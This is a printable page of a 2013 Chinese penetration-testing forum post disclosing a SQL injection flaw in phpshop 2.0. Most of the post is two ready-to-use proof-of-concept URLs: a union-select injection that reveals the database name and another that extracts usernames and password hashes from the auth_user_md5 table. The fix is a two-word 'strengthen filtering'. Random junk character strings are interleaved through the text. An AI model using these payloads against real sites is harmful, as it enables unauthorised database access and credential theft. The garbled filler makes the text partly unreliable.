中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]

---

作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability

0 ]1 s: R8 U; k; V  R作者 : By onestree
# m* J0 f" O2 m! @" g下载地址 : http://code.google.com/p/phpshop/downloads/list
7 y: `8 a$ y, s% U8 D8 q测试地址: windows 7 / ubuntu

! V3 F- a8 G" g  r
) f# @2 T, _/ P& F1 h2 LSQLi p0c:

2 N' E5 o, n. s8 Y2 m==================

5 R7 @0 k0 y6 N* T* lhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --

http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
) N# v6 |7 a; Y# D' l
修复：
加强过滤
1 m4 v6 D! Q; U5 G/ V- W​
4 {# Q- L( o; c) ]
, Q- M1 N3 O; c% B

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2